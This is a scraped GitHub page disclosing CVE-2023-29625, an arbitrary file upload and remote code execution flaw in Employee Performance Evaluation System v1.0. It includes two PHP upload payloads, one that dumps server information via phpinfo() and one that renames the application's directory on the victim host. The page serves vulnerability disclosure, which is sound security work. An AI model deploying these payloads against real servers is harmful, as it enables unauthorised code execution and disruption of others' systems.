Headline
CVE-2023-29625: CVE-nu11secur1ty/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0 at main · nu11secur1ty/CVE-nu11secur1ty
Employee Performance Evaluation System v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Latest commit
FilesPermalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Vendor
Description:
The Employee Performance Evaluation System-1.0 suffer from File Inclusion - RCE Vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After then this user can execute remotely the already malicious included file on the server of the victim. This can bring the system to disaster or can destroy all information that is inside or this information can be stolen.
STATUS: CRITICAL Vulnerability
[+]Get Info:
<?php // by nu11secur1ty - 2023 phpinfo(); ?>
[+]Exploit:
<?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = “C:/xampp7/htdocs/pwnedhost7/epes/” ;
// New Name For The File $new_name = “C:/xampp7/htdocs/pwnedhost7/epes15/” ;
// using rename() function to rename the file rename( $old_name, $new_name) ;
?>
RCE using curl protocol
Reproduce:
href
Proof and Exploit:
href
Reference:
href
Time spend:
00:17:00